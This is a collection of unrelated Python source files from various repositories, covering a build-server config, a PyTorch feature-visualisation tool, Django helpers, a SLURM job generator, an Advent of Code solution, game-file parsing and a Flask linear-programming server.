# See https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019#disable-just-in-time-debugging-from-the-windows-registry)
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, current_key, 0, winreg.KEY_ALL_ACCESS) as open_key:
winreg.DeleteValue(open_key, entry)
except:
pass
# A class that is responsible for configuring the server when running the build.
class ServerConfig(object):
def __init__(self, presubmit):
self.presubmit = presubmit
self.env = os.environ.copy()
self.ccache = find_executable('ccache')
def get_env(self):
return self.env
def __enter__(self):
# On windows we do not want debug ui to be activated.
if platform.system() == 'Windows':
disable_debug_policy()
# Never run ccache outside of presubmit, even if it might be available.
if not self.presubmit:
self.env['CCACHE_DISABLE'] = 'True'
logging.info('Disabling ccache.')
else:
# We cannot rely on mtime for compiler identification as the build bots
# do a fresh checkout of the compiler.
self.env['CCACHE_COMPILERCHECK'] = 'string:%compiler% --version'
if self.ccache:
logging.info('Enabling ccache.')
return self
def __exit__(self, exc_type, exc_value, tb):
# We clear the cache in case of failures.
if exc_type and exc_value:
if self.ccache:
logging.info('Clearing ccache.')
subprocess.call([self.ccache, '-C'])
| 2,457 |
torchprism/PRISM.py
|
szandala/PRISM
| 0 |
2170061
|
from torch.nn import Conv2d, MaxPool2d
from torch import no_grad, round
from torch.nn.functional import interpolate
from itertools import chain
class PRISM:
_excitations = []
_hook_handlers = []
_is_orig_image = True
def _excitation_hook(module, input, output):
# for better output sharpness we collect input images
if PRISM._is_orig_image:
PRISM._excitations.append(input[0])
PRISM._is_orig_image = False
PRISM._excitations.append(output)
def register_hooks(model, recursive=False):
if not recursive and PRISM._hook_handlers:
print("Hooks can only be registered to one model at once. Please use: `prune_old_hooks()`")
return
for i, layer in enumerate(model.children()):
if list(layer.children()):
PRISM.register_hooks(layer, recursive=True)
elif isinstance(layer, MaxPool2d):
PRISM._hook_handlers.append(
layer.register_forward_hook(PRISM._excitation_hook)
)
elif isinstance(layer, Conv2d) and layer.stride > (1, 1):
PRISM._hook_handlers.append(
layer.register_forward_hook(PRISM._excitation_hook)
)
def prune_old_hooks(model):
if not PRISM._hook_handlers:
print("No hooks to remove")
for hook in PRISM._hook_handlers:
hook.remove()
PRISM._hook_handlers = []
###############################################
def _svd(final_excitation):
final_layer_input = final_excitation.permute(0, 2, 3, 1).reshape(
-1, final_excitation.shape[1]
)
normalized_final_layer_input = final_layer_input - final_layer_input.mean(0)
# normalized_final_layer_input = final_layer_input
u, s, v = normalized_final_layer_input.svd(compute_uv=True)
raw_features = u[:, :3].matmul(s[:3].diag())
return raw_features.view(
final_excitation.shape[0],
final_excitation.shape[2],
final_excitation.shape[3],
3
).permute(0, 3, 1, 2)
def _quantize(maps):
# h,w,c
maps = PRISM._normalize_to_rgb(maps).permute(0, 2, 3, 1)
quant_maps = 0.5 * round(maps / 0.5)
image_colors = []
for img in quant_maps:
colors_set = set()
for row in img:
for pixel in row:
colors_set.add(pixel.numpy().tostring())
image_colors.append(colors_set)
return quant_maps, image_colors
def _intersection(maps):
quant_maps, image_colors = PRISM._quantize(maps)
common_colors = set.intersection(*image_colors)
for img in quant_maps:
for row in img:
for pixel in row:
if pixel.numpy().tostring() not in common_colors:
pixel *= 0.0
return quant_maps.permute(0, 3, 1, 2)
def _difference(maps):
quant_maps, image_colors = PRISM._quantize(maps)
all_colors= set(chain.from_iterable(image_colors))
exclusive_colors = all_colors - set.intersection(*image_colors)
for img in quant_maps:
for row in img:
for pixel in row:
if pixel.numpy().tostring() not in exclusive_colors:
pixel *= 0.0
return quant_maps.permute(0, 3, 1, 2)
def _upsampling(extracted_features, pre_excitations):
for e in pre_excitations[::-1]:
extracted_features = interpolate(
extracted_features,
size=(e.shape[2], e.shape[3]),
mode="bilinear",
align_corners=False,
)
extracted_features *= e.mean(dim=1, keepdim=True)
return extracted_features
def _normalize_to_rgb(features):
scaled_features = (features - features.mean()) / features.std()
scaled_features = scaled_features.clip(-1, 1)
scaled_features = (scaled_features - scaled_features.min()) / (
scaled_features.max() - scaled_features.min()
)
return scaled_features
def get_maps(grad_extrap=True, inclusive=False, exclusive=False):
if not PRISM._excitations:
print("No data in hooks. Have You used `register_hooks(model)` method?")
return
# [print(e.shape) for e in PRISM._excitations]
with no_grad():
extracted_features = PRISM._svd(PRISM._excitations.pop())
if inclusive and exclusive:
rgb_features_map, _ = PRISM._quantize(extracted_features)
rgb_features_map = rgb_features_map.permute(0, 3, 1, 2)
elif exclusive:
rgb_features_map = PRISM._difference(extracted_features)
elif inclusive:
rgb_features_map = PRISM._intersection(extracted_features)
else:
rgb_features_map = extracted_features
if grad_extrap:
rgb_features_map = PRISM._upsampling(
rgb_features_map, PRISM._excitations
)
rgb_features_map = PRISM._normalize_to_rgb(rgb_features_map)
# prune old PRISM._excitations
PRISM.reset_excitations()
return rgb_features_map
def reset_excitations():
PRISM._is_orig_image = True
PRISM._excitations = []
| 5,475 |
messengerext/home/templatetags/ifrole.py
|
groupsome/groupsome
| 6 |
2169995
|
from django import template
class IfRoleNode(template.Node):
def __init__(self, nodelist, role):
self.nodelist = nodelist
self.role = role
def render(self, context):
user = context.request.user
group = context["group"]
if group.has_role(user, self.role):
return self.nodelist.render(context)
return ""
def ifrole(parser, token):
nodelist = parser.parse(('endifrole',))
parser.delete_first_token()
try:
tag, route = token.split_contents()
except ValueError:
raise template.TemplateSyntaxError("%r tag required one argument" % token.contents.split()[0])
return IfRoleNode(nodelist, route.strip('"\''))
register = template.Library()
register.tag('ifrole', ifrole)
| 775 |
mysalon/forms.py
|
Nyakinyua/Bookings
| 0 |
2169908
|
from django import forms
from .models import *
from pyuploadcare.dj.forms import ImageField
from django.contrib.auth.models import User
class AddCommentForm(forms.ModelForm):
class Meta:
model = Comments
exclude = ['user','post']
# class CustomSignupForm(signupForm):
# first_name = forms.CharField(max_length=30, label='First Name')
# last_name = forms.CharField(max_length=30, label='Last Name')
# def signup(self,request,user):
# user.first_name = self.cleaned_data['first_name']
# user.last_name = self.cleaned_data['last_name']
# user.save()
# return user
| 635 |
c/ch8/genweak.py
|
thw1021/p4pdes
| 115 |
2170034
|
#!/usr/bin/env python3
# WARNING: You will need to edit this file to match your batch system!!
from argparse import ArgumentParser, RawTextHelpFormatter
import numpy as np
intro = '''
Write SLURM batch files for weak scaling study using ch7/minimal.c. Examples:
./genweak.py -email <EMAIL> -queue debug -maxP 1 -minutes 60
./genweak.py -email <EMAIL> -queue debug -minP 4 -maxP 4 -pernode 2 -minutes 60
./genweak.py -email <EMAIL> -queue debug -minP 4 -maxP 4 -pernode 4 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 4 -maxP 4 -pernode 1 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 16 -maxP 64 -pernode 4 -minutes 60
./genweak.py -email <EMAIL> -queue t2standard -minP 16 -maxP 256 -pernode 8 -minutes 60
Solves 2D minimal surface equation using grid-sequenced Newton GMRES+GMG solver
and 33x33 coarse grid. Each process gets a 1024x1024 grid with N/P = 1.05e6.
'''
parser = ArgumentParser(description=intro, formatter_class=RawTextHelpFormatter)
parser.add_argument('-email', metavar='EMAIL', type=str,
default='<EMAIL>', help='email address')
parser.add_argument('-maxP', type=int, default=4, metavar='P',
help='''maximum number of MPI processes;
power of 4 like 4,16,64,256,1024,... recommended''')
parser.add_argument('-minP', type=int, default=1, metavar='P',
help='''minimum number of MPI processes;
power of 4 like 1,4,16,64,256,... recommended''')
parser.add_argument('-minutes', type=int, default=60, metavar='T',
help='''max time in minutes for SLURM job''')
parser.add_argument('-queue', metavar='Q', type=str,
default='debug', help='SLURM queue (partition) name')
parser.add_argument('-pernode', type=int, default=2, metavar='K',
help='''maximum number of MPI processes to assign to each node;
small value may increase streams bandwidth and performance''')
parser.add_argument('-streams', action='store_true', default=False,
help='include "make streams" before run (but may hang on attempt to use python?)')
args = parser.parse_args()
print('settings: %s queue, %d max tasks per node, %s as email, request time %d minutes'
% (args.queue,args.pernode,args.email,args.minutes))
m_min = int(np.floor(np.log(float(args.minP)) / np.log(4.0)))
m_max = int(np.floor(np.log(float(args.maxP)) / np.log(4.0)))
Plist = np.round(4.0**np.arange(m_min,m_max+1)).astype(int).tolist()
print('runs (ch7/minimal.c) will use P in'),
print(Plist)
rawpre = r'''#!/bin/bash
#SBATCH --partition=%s
#SBATCH --ntasks=%d
#SBATCH --tasks-per-node=%d
#SBATCH --time=%d
#SBATCH --mail-user=%s
#SBATCH --mail-type=BEGIN
#SBATCH --mail-type=END
#SBATCH --mail-type=FAIL
#SBATCH --output=%s
# This cluster needs these for some reason.
ulimit -s unlimited
ulimit -l unlimited
# Generate a list of allocated nodes as a machinefile for mpiexec.
srun -l /bin/hostname | sort -n | awk '{print $2}' > ./nodes.$SLURM_JOB_ID
# Launches the MPI application.
GO="mpiexec -n $SLURM_NTASKS -machinefile ./nodes.$SLURM_JOB_ID"
cd $SLURM_SUBMIT_DIR
'''
rawstreams= r'''
# Get streams info for these processes.
cd $PETSC_DIR
make streams NPMAX=$SLURM_NTASKS
cd $SLURM_SUBMIT_DIR
'''
rawminimal = r'''
# MINIMAL: solve 2D minimal surface equation
# using grid-sequenced Newton GMRES+GMG solver and 33x33 coarse grid
# with -snes_grid_sequence %d is %dx%d fine grid
# each process has N/P = %d degrees of freedom
$GO ../ch7/minimal -da_grid_x 33 -da_grid_y 33 -snes_grid_sequence %d -snes_fd_color -snes_converged_reason -snes_monitor -ksp_converged_reason -pc_type mg -log_view
'''
minimaldict = { 1: (5,1025),
4: (6,2049),
16: (7,4097),
64: (8,8193),
256: (9,16385)}
for P in Plist:
rlev = minimaldict[P][0] # refinement level
grid = minimaldict[P][1]
wrun = rawminimal % (rlev,grid,grid,grid*grid/P,rlev)
pernode = min(P,args.pernode)
nodes = P / pernode
print(' case: %d nodes, %d tasks per node, and P=%d processes on %dx%d grid'
% (nodes,pernode,P,grid,grid))
root = 'weak_minimal_%s_%d_%d' % (args.queue[:2],P,pernode)
preamble = rawpre % (args.queue,P,pernode,args.minutes,args.email,
root + r'.o.%j')
batchname = root + '.sh'
print(' writing %s ...' % batchname)
batch = open(batchname,'w')
batch.write(preamble)
if args.streams:
batch.write(rawstreams)
batch.write(wrun)
batch.close()
| 4,564 |
2016/day08/two_factor.py
|
kmcginn/advent-of-code
| 0 |
2168746
|
""" Solution to Day 8
from: http://adventofcode.com/2016/day/8
--- Day 8: Two-Factor Authentication ---
You come across a door implementing what you can only assume is an implementation of two-factor
authentication after a long game of requirements telephone.
To get past the door, you first swipe a keycard (no problem; there was one on a nearby desk). Then,
it displays a code on a little screen, and you type that code on a keypad. Then, presumably, the
door unlocks.
Unfortunately, the screen has been smashed. After a few minutes, you've taken everything apart and
figured out how it works. Now you just have to work out what the screen would have displayed.
The magnetic strip on the card you swiped encodes a series of instructions for the screen; these
instructions are your puzzle input. The screen is 50 pixels wide and 6 pixels tall, all of which
start off, and is capable of three somewhat peculiar operations:
rect AxB turns on all of the pixels in a rectangle at the top-left of the screen which is A wide
and B tall.
rotate row y=A by B shifts all of the pixels in row A (0 is the top row) right by B pixels. Pixels
that would fall off the right end appear at the left end of the row.
rotate column x=A by B shifts all of the pixels in column A (0 is the left column) down by B
pixels. Pixels that would fall off the bottom appear at the top of the column.
For example, here is a simple sequence on a smaller screen:
rect 3x2 creates a small rectangle in the top-left corner:
###....
###....
.......
rotate column x=1 by 1 rotates the second column down by one pixel:
#.#....
###....
.#.....
rotate row y=0 by 4 rotates the top row right by four pixels:
....#.#
###....
.#.....
rotate column x=1 by 1 again rotates the second column down by one pixel, causing the bottom pixel
to wrap back to the top:
.#..#.#
#.#....
.#.....
As you can see, this display technology is extremely powerful, and will soon dominate the
tiny-code-displaying-screen market. That's what the advertisement on the back of the display tries
to convince you, anyway.
There seems to be an intermediate check of the voltage used by the display: after you swipe your
card, if the screen did work, how many pixels should be lit?
--- Part Two ---
You notice that the screen is only capable of displaying capital letters; in the font it uses,
each letter is 5 pixels wide and 6 tall.
After you swipe your card, what code is the screen trying to display?
"""
def print_display(display):
"""Print a nice visualization of the display, for funsies"""
for row in display:
output = ''
for col in row:
output += col
print(output)
def process_instruction(instruction, display):
"""Apply the given instruction to the display"""
parsed = instruction.split()
if parsed[0] == 'rect':
width, height = [int(x) for x in parsed[1].split('x')]
for row in range(0, height):
for col in range(0, width):
display[row][col] = '#'
elif parsed[0] == 'rotate':
if parsed[1] == 'row':
row = int(parsed[2].split('=')[1])
rotation = int(parsed[4])
display[row] = display[row][-rotation:] + display[row][:-rotation]
elif parsed[1] == 'column':
col = int(parsed[2].split('=')[1])
rotation = int(parsed[4])
# TODO: populate rotated_display in a better way
rotated_display = list(list())
for row in range(len(display)-rotation, len(display)):
rotated_display.append(display[row].copy())
for row in range(0, len(display)-rotation):
rotated_display.append(display[row].copy())
for row in range(0, len(display)):
display[row][col] = rotated_display[row][col]
else:
raise Exception
else:
raise Exception
return display
def main():
"""Solve the problem, yo!"""
display_width = 50
display_height = 6
display = [['.' for i in range(0, display_width)] for i in range(0, display_height)]
instructions = list()
with open("input.txt") as input_file:
for line in input_file:
instructions.append(line)
for instr in instructions:
display = process_instruction(instr, display)
print_display(display)
# count the illuminated pixels
on_count = 0
for row in display:
for col in row:
if col == '#':
on_count += 1
print(on_count)
if __name__ == "__main__":
main()
| 4,555 |
turing/tape.py
|
zhzLuke96/Tur-ing
| 0 |
2169275
|
class tape:
def __init__(self,call=None):
self.this = [0]
self.cursor = 0
self.call = call
def get(self):
return self.this[self.cursor]
def set(self, val):
if self.call is not None:self.call()
self.this[self.cursor] = abs(val)
def getChar(self, b):
return chr(self.get() + b)
def inc(self):
if self.call is not None:self.call()
self.this[self.cursor] += 1
def sub(self):
if self.call is not None:self.call()
self.this[self.cursor] -= 1
def rise(self):
self.cursor += 1
if len(self.this) <= self.cursor:
self.this.append(0)
def drop(self):
self.cursor -= 1
def disp(self, b, g):
print(self.getChar(b) + g, end="")
def dispVal(self, b, g):
print(str(self.get()) + g, end='')
| 863 |
inferlo/pairwise/inference/tree_dp_test.py
|
InferLO/inferlo
| 1 |
2167792
|
# Copyright (c) 2020, The InferLO authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 - see LICENSE file.
import numpy as np
from inferlo import PairWiseFiniteModel
from inferlo.testing import (tree_potts_model,
line_potts_model, assert_results_close)
def test_vert15_alph2():
model = tree_potts_model(gr_size=10, al_size=2, seed=123)
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
def test_vert5_alph3():
model = tree_potts_model(gr_size=5, al_size=3, seed=123)
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
def test_long_line():
gr_size = 1000
al_size = 5
j = np.ones((al_size, al_size)) + np.eye(al_size)
model = line_potts_model(gr_size=gr_size, al_size=al_size,
seed=111, same_j=j, zero_field=True)
result = model.infer(algorithm='tree_dp')
assert np.allclose(result.marg_prob,
np.ones((gr_size, al_size)) / al_size)
def test_big_tree():
gr_size = 1000
al_size = 5
j = np.ones((al_size, al_size)) + np.eye(al_size)
model = tree_potts_model(gr_size=gr_size, al_size=al_size,
seed=111, same_j=j, zero_field=True)
result = model.infer(algorithm='tree_dp')
assert np.allclose(result.marg_prob,
np.ones((gr_size, al_size)) / al_size)
def test_fully_isolated():
model = PairWiseFiniteModel(10, 2)
model.set_field(np.random.random(size=(10, 2)))
ground_truth = model.infer(algorithm='bruteforce')
result = model.infer(algorithm='tree_dp')
assert_results_close(result, ground_truth)
| 1,830 |
setup.py
|
PermutaTriangle/PermStruct
| 1 |
2170033
|
#!/usr/bin/env python
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "permstruct",
version = "0.0.1",
author = "<NAME>",
author_email = "<EMAIL>",
description = "An implementation of the PermStruct algorithm.",
license = "BSD-3",
keywords = "permutations generating rules",
url = "https://github.com/PermutaTriangle/PermStruct",
packages=[
'permstruct',
'permstruct.dag',
'permstruct.permutation_sets',
'permstruct.permutation_sets.units',
],
long_description=read('README.md'),
test_suite = 'tests'
)
| 678 |
retro_data_structures/formats/script_object.py
|
EthanArmbrust/Retro-data-structures
| 2 |
2168733
|
"""
https://wiki.axiodl.com/w/Scriptable_Layers_(File_Format)
"""
import io
from typing import Iterator
import construct
from construct import Container
from construct.core import (
Adapter, BitStruct, BitsInteger, GreedyBytes, Hex, Int8ub, Int16ub, Int32ub, Prefixed,
PrefixedArray, Struct, Union,
)
from retro_data_structures import game_check
from retro_data_structures.common_types import FourCC
from retro_data_structures.game_check import Game, current_game_at_least_else
from retro_data_structures.property_template import GetPropertyConstruct
def Connection(subcon):
return Struct(
state=subcon,
message=subcon,
target=Hex(Int32ub),
)
class ScriptInstanceAdapter(Adapter):
def __init__(self, obj_id_func):
super().__init__(GreedyBytes)
self.obj_id_func = obj_id_func
def _get_property_construct(self, context):
game = construct.evaluate(game_check.get_current_game, context)
obj_id = construct.evaluate(self.obj_id_func, context)
return GetPropertyConstruct(game, obj_id)
def _decode(self, obj, context, path):
subcon = self._get_property_construct(context)
return subcon._parsereport(io.BytesIO(obj), context, path)
def _encode(self, obj, context, path):
subcon = self._get_property_construct(context)
encoded = io.BytesIO()
subcon._build(obj, encoded, context, path)
return encoded.getvalue()
def ThisTypeAsString(this):
return f"0x{this._.type:X}" if isinstance(this._.type, int) else this._.type
_prefix = current_game_at_least_else(Game.ECHOES, Int16ub, Int32ub)
ScriptInstance = Struct(
type=game_check.current_game_at_least_else(Game.ECHOES, FourCC, Int8ub),
instance=Prefixed(
_prefix,
Struct(
id=Union(
"raw",
"raw" / Hex(Int32ub),
"parts" / BitStruct(
"layer" / BitsInteger(6),
"area" / BitsInteger(10),
"instance" / BitsInteger(16)
)
),
connections=PrefixedArray(_prefix, Connection(current_game_at_least_else(Game.ECHOES, FourCC, Int32ub))),
# base_property=ScriptInstanceAdapter(ThisTypeAsString),
base_property=GreedyBytes,
),
),
)
class ScriptInstanceHelper:
_raw: Container
target_game: Game
def __init__(self, raw: Container, target_game: Game):
self._raw = raw
self.target_game = target_game
def __str__(self):
return "<ScriptInstance {} 0x{:08x}>".format(self.type_name, self.id)
def __eq__(self, other):
return isinstance(other, ScriptInstanceHelper) and self._raw == other._raw
@classmethod
def new_instance(cls, target_game: Game, instance_type):
prop_construct = GetPropertyConstruct(target_game, instance_type, True)
# TODO: make this less ugly lmao
raw = ScriptInstance.parse(ScriptInstance.build({
"type": instance_type,
"instance": {
"id": {"raw": 0},
"connections": [],
"base_property": prop_construct.build({}, target_game=target_game)
}
}, target_game=target_game), target_game=target_game)
return cls(raw, target_game)
@property
def type(self) -> str:
return self._raw.type
@property
def type_name(self) -> str:
try:
return self.get_properties()["_name"]
except Exception:
return self.type
@property
def id(self) -> int:
return self._raw.instance.id.raw
@property
def name(self) -> str:
return self.get_property(("EditorProperties", "Name"))
@property
def _property_construct(self):
return GetPropertyConstruct(self.target_game, self.type)
def get_properties(self):
return self._property_construct.parse(
self._raw.instance.base_property,
target_game=self.target_game,
)
def set_properties(self, data: Container):
self._raw.instance.base_property = self._property_construct.build(
data, target_game=self.target_game,
)
def get_property(self, chain: Iterator[str]):
prop = self.get_properties()
for name in chain:
prop = prop[name]
return prop
@property
def connections(self):
return self._raw.instance.connections
def add_connection(self, state, message, target: "ScriptInstanceHelper"):
self.connections.append(Container(
state=state,
message=message,
target=target.id
))
| 4,695 |
pyqtnavutils/__init__.py
|
dhzdhd/pyqt_nav_utils
| 0 |
2168546
|
"""PyQtNavUtils - Customisable animated Drawer and NavBar widgets."""
from pyqtnavutils.drawer import DraggableDrawer, Drawer
from pyqtnavutils.navbar import NavigationBar, NavigationBarItem
__all__ = ["Drawer", "DraggableDrawer", "NavigationBar", "NavigationBarItem"]
| 272 |
csat/acquisition/urls.py
|
GaretJax/csat
| 0 |
2169033
|
from django.conf.urls import patterns, url
urlpatterns = patterns(
'csat.acquisition.views',
url(
r'^$',
'session_index',
name='session-index'
),
url(
r'^new/$',
'session_create',
name='session-create'
),
url(
r'^(?P<pk>\d+)/$',
'session_view',
name='session'
),
url(
r'^(?P<pk>\d+)/edit/$',
'session_edit',
name='session-edit'
),
url(
r'^(?P<pk>\d+)/reset/$',
'session_reset',
name='session-reset'
),
url(
r'^(?P<pk>\d+)/run/$',
'session_run',
name='session-run'
),
url(
r'^(?P<pk>\d+)/thumbnail.png$',
'session_thumbnail',
name='session-thumbnail'
),
url(
r'^(?P<pk>\d+)/delete/$',
'session_delete',
name='session-delete'
),
url(
r'^results/(?P<result_id>[^/]+)/$',
'collector_upload_results',
name='collector-upload-results'
),
url(
r'^(?P<session_pk>\d+)/add/(?P<collector>[^/]+)/$',
'collector_create',
name='collector-create'
),
url(
r'^(?P<session_pk>\d+)/edit/(?P<collector_pk>\d+)/$',
'collector_edit',
name='collector-edit'
),
url(
r'^(?P<session_pk>\d+)/delete/(?P<collector_pk>\d+)/$',
'collector_remove',
name='collector-remove'
),
url(
(r'^(?P<session_pk>\d+)/(?P<collector_pk>\d+)/log.'
'(?P<format>txt|html)?$'),
'collector_view_log',
name='collector-view-log'
),
url(
(r'^(?P<session_pk>\d+)/(?P<collector_pk>\d+)/graph.'
'(?P<format>graphml|html)?$'),
'collector_view_results',
name='collector-view-results'
),
url(
r'^(?P<session_pk>\d+)/graph.(?P<format>html|graphml)?$',
'session_view_results',
name='session-view-results'
),
)
| 1,957 |
renovation_core/doc_events/system_settings.py
|
Abadulrehman/renovation_core
| 18 |
2169646
|
import frappe
def on_change(doc, method):
from ..utils.logging import update_cache
update_cache()
def before_update(doc, method):
if doc.get("sms_settings") and not frappe.db.get_value('SMS Settings', None, 'sms_gateway_url'):
provider = frappe.get_doc("SMS Provider", doc.get("sms_settings"))
sms_settings = frappe.get_single("SMS Settings")
data = provider.as_dict()
del data["name"]
del data["doctype"]
sms_settings.update(data)
sms_settings.flags.ignore_permissions = True
sms_settings.save()
| 539 |
rfmodel.py
|
Codeomicronzeta/Churn-Model
| 0 |
2168642
|
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
data = pd.read_csv('Processed_Churn_data.csv')
dep_var = data.iloc[:, 0:15]
churn = data['Exited']
# Creating Train and Test Set
X_train, X_val, y_train, y_val = train_test_split(dep_var, churn, random_state = 0)
# Creating Random Forest Model
model_pi = RandomForestClassifier(random_state=1, n_estimators = 2000)
model_pi = model_pi.fit(X_train[['Age', 'NumOfProducts', 'EstimatedSalary', 'CreditScore', 'Balance', 'Tenure']],
y_train)
preds_mpi = model_pi.predict(X_val[['Age', 'NumOfProducts', 'EstimatedSalary', 'CreditScore', 'Balance', 'Tenure']])
| 727 |
algorithm-server/main.py
|
qiruiqwe/Optimization
| 1 |
2169735
|
# @Time : 2020/12/6 22:47
# @Author : 亓瑞
# @File : main.py
# @desc :
import numpy as np
from flask import Flask, request, jsonify, make_response
import json
from trans import trans
app = Flask(__name__)
class Simplex(object):
@staticmethod
def min(data):
(width, length) = data.shape
base_list = list(range(length - width, length - 1))
while True:
no_base_list = [i for i in range(length - 1) if i not in base_list]
c_b = data[0][base_list]
distinguish_number = [np.dot(data[1:, i], c_b) - data[0][i] for i in no_base_list]
# 1.计算适应度值
b = data[1:, length - 1]
fit = np.dot(b, c_b)
# 2.判决数都 < 0,结束循环
if max(distinguish_number) < 0:
# base_list是x的序号的值,b是对应的x的值
return fit, base_list, b
else:
# 3.换入列号
column = no_base_list[distinguish_number.index(max(distinguish_number))]
# 4.换出列号
temp = []
for a, c in zip(data[1:, length - 1], data[1:, column]):
if c <= 0:
temp.append(float('inf'))
else:
temp.append(a / c)
if min(temp) == float('inf'):
# 4.1.没有可换出列
return fit, base_list, b
else:
row_index = temp.index(min(temp))
# 更新data
base_list[row_index] = column
row_index += 1
data[row_index, :] /= data[row_index, column]
for i in [x for x in range(1, width) if x != row_index]:
data[i, :] += (-data[i, column] * data[row_index, :])
@staticmethod
def max(data):
(width, length) = data.shape
base_list = list(range(length - width, length - 1))
while True:
no_base_list = [i for i in range(length - 1) if i not in base_list]
c_b = data[0][base_list]
distinguish_number = [np.dot(data[1:, i], c_b) - data[0][i] for i in no_base_list]
# 1.计算适应度值
b = data[1:, length - 1]
fit = np.dot(b, c_b)
# 2.判决数都 < 0,结束循环
if min(distinguish_number) > 0:
return fit, base_list, b
else:
# 3.换入列号
column = no_base_list[distinguish_number.index(min(distinguish_number))]
# 4.换出列号
temp = []
for a, c in zip(data[1:, length - 1], data[1:, column]):
if c <= 0:
temp.append(float('inf'))
else:
temp.append(a / c)
if min(temp) == float('inf'):
# 4.1.没有可换出列
return fit, base_list, b
else:
row_index = temp.index(min(temp))
# 更新data
base_list[row_index] = column
row_index += 1
data[row_index, :] /= data[row_index, column]
for i in [x for x in range(1, width) if x != row_index]:
data[i, :] += (-data[i, column] * data[row_index, :])
@staticmethod
def formatString(data, flag, value, base_list, base_value):
# flag = 0 最小值 1 最大值
v_name = []
(width, length) = data.shape
for i in range(length):
v_name.append('x'+str(i+1))
# print(v_name)
if flag == 0:
message = 'min '
param = "最小值为:"
else:
message = 'max '
param = "最大值为:"
for j in range(length - 1):
if data[0][j] == 0:
message = message + " "
else:
message = message + '%2s' % str(int(data[0][j])) + '*' + '%4s' % v_name[j]
if data[0][j+1] > 0:
message = message + ' + '
elif data[0][j+1] == 0:
pass
all_message = message + '#'
for i in range(1, width):
message = ''
for j in range(length-1):
if data[i][j] == 0:
message = message + " "
else:
message = message + '%2s' % str(int(data[i][j])) + '*' + '%4s' % v_name[j]
if data[i][j + 1] > 0 and (j+1) != (length-1):
message = message + '+'
elif data[i][j + 1] == 0:
pass
message = message + ' = ' + '%2s' % str(int(data[i][length-1]))
all_message = all_message + message + "#"
all_message += '#'
all_message = all_message + '%-8s' %param + '%2s' % str(value) + '#'
result = ''
print(base_list)
print(base_value)
for i in zip(base_list, base_value):
result += '%-4s' % v_name[i[0]] + ' = ' + '%5s' % str(i[1]) + '#'
all_message = all_message + result
print(all_message)
return all_message
def getString(s,d):
str = '产量:'
for i in s:
str += '%4s %3d\t' % (i[0], i[1])
str += '\n'+'销量:'
for i in d:
str += '%4s %3d\t' % (i[0], i[1])
str += '\n'
return str
@app.route('/simplexMin', methods=['GET', 'POST'])
def simplex_min():
params = request.get_data()
json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
rawMetaData = metaData.replace('#', '\n')
filename = './simplex.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
dataMin = np.loadtxt(filename, dtype=np.float)
# print(data_min)
value, base_list, base_value = Simplex.min(dataMin)
dataMin = np.loadtxt(filename, dtype=np.float)
info = Simplex.formatString(dataMin, 0, value, base_list, base_value)
print(info)
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"data": value,
"info": info
}
# cur.close()
# conn.close()
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
@app.route('/simplexMax', methods=['GET', 'POST'])
def simplex_max():
params = request.get_data()
json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
rawMetaData = metaData.replace('#', '\n')
filename = './simplex.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
dataMax = np.loadtxt(filename, dtype=np.float)
value, base_list, base_value = Simplex.max(dataMax)
dataMax = np.loadtxt(filename, dtype=np.float)
info = Simplex.formatString(dataMax, 1, value, base_list, base_value)
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"data": value,
"info": info
}
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
@app.route('/transportation', methods=['GET', 'POST'])
def transportation():
params = request.get_data()
json_data = json.loads(params.decode('utf-8'))
metaData = json_data["meta"]
# print(metaData)
rawMetaData = metaData.replace('#', '\n')
filename = './transportation.txt'
with open(filename, 'w') as file_object:
file_object.write(rawMetaData)
dataMax = np.loadtxt(filename, dtype=np.float)
# print(dataMax)
(width, length) = dataMax.shape
# 产地数组
product = ['A' + str(i) for i in range(1, width)]
# print(product)
# 销地名称数组
sale = ['B' + str(i) for i in range(1, length)]
# print(sale)
s = [(product[i], dataMax[i, length - 1]) for i in range(width - 1)]
d = [(sale[i], dataMax[width - 1, i]) for i in range(length - 1)]
# c = dataMax[:width - 1, :length - 1]
re = trans(tuple(product), tuple(sale), dataMax)
info = getString(s, d)
# print(s)
info += re
result = {
'status': 20000,
'message': '这里你看到的是单纯形法',
"info": info,
}
response = make_response(jsonify(result))
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
response.status = "200"
return response
if __name__ == '__main__':
'''
第一行为数据
其余行为约束
'''
data_max = np.loadtxt("data-3.1.3.txt", dtype=np.float)
value, base_list, base_value = Simplex.max(data_max)
info = Simplex.formatString(data_max, 1, value, base_list, base_value)
print(info)
app.run(host="0.0.0.0")
| 9,083 |
eda/integration.py
|
viniCerutti/eel
| 0 |
2169961
|
"""
Proper EDA script.
"""
import copy
import random
from datetime import datetime as dt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from eda import Ensemble
def __get_elite__(P_fitness, A=None):
"""
From the set of individuals of the current population, selects the elite individuals based on whether
their fitness surpasses the median or not.
